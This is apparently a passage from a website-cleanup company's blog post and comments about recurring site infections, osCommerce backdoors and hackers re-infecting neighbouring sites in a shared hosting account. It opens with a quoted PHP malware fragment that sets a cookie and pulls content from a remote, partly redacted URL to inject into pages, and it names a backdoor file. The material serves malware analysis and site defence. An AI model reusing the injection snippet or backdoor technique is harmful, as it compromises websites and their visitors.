@setcookie("stats",md5("stats"),time()+10800);
$evalsssgqulVBTkZLAch =@file_get_contents("http://??/in.php?i= &b=???&h="); //I still have to find out the exact URL.
if (strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];
echo $evalsssgqulVBTkZLAch;

The code also creates a cookie by the name “stats”, which is used to set the URL (domain and parameters).

This happens in a number of ways.

First, often times a hacker will upload a “backdoor” script. This backdoor provides them with a filemanager like view. So everything you can see in your filemanager from your control panel, they have access to as well.

Second, when their (the hackers) script runs to infect files, it seeks out files in all accessible folders.

Quite often we see where the hackers will find a point of entry on one website in a hosting account, and they won’t infect that site but they will infect one of the other sites. They do this because they want you to spend all your time, energy and attention on the one that is infected. So you get it cleaned and then they re-infect it again and again.

Then they might infect one of the other sites in that hosting account and play the same game.

This is why we insist on cleaning all the websites in a hosting account and why are prices are lower on additional websites. Until you scan, clean and analyze all the websites in a hosting account, you’ll never know if you’re really clean.

There are no htacces infected files attached.

Do you think that is possible that they can enter from one vulnerable website to hack the other websites from the same hosting account?

Thanks!

If your site is built with osCommerce, there are a number of steps to follow to secure it.

Until you find that point of entry and remove it, your site will continually get infected.

Let us know if you need help.

The designer and host of my organization’s website has cleaned the website several times. But V!RUS.DZ keeps coming back. Our website is designed for teaching peace education. We are working with a large number of kids in an out of school to cultivate new lifestyle of peaceful co-existence,

I can understand why we are hated as peacemakers, peacebuilders, and peace teachers! We need our website for the work we do! We can we do to stop these hackers from Algeria!

PS: Just tweeted this post.

class.images.php is the issue as correctly pointed out in the above article.

Thanks!!

You have correctly identified class.images.php as the culprit. There is another file called class.image.php in the same ajaxfilemanager/inc folder and that looks like the valid one and looks fine.

Keep up the good work!

We’ve been seeing hosting accounts with multiple websites getting infected in strange ways.

Let’s say there are 6 websites. The hackers might find a point of entry in website #1. They don’t infect that website, they infect websites #5 and #6. This way, you focus all your attention on those sites and not the one they used as their point of entry. This buys them more time re-infecting your sites until you eventually check all your websites and finally focus on website #1 and close the door on their point of entry.

We see this played out all the time. That’s the problem when people with multiple websites on a hosting account ask us to only clean one website. We can fight with that one but we can’t keep the hackers out until we service all the websites on that hosting account. That’s why we dropped the price so drastically on additional websites.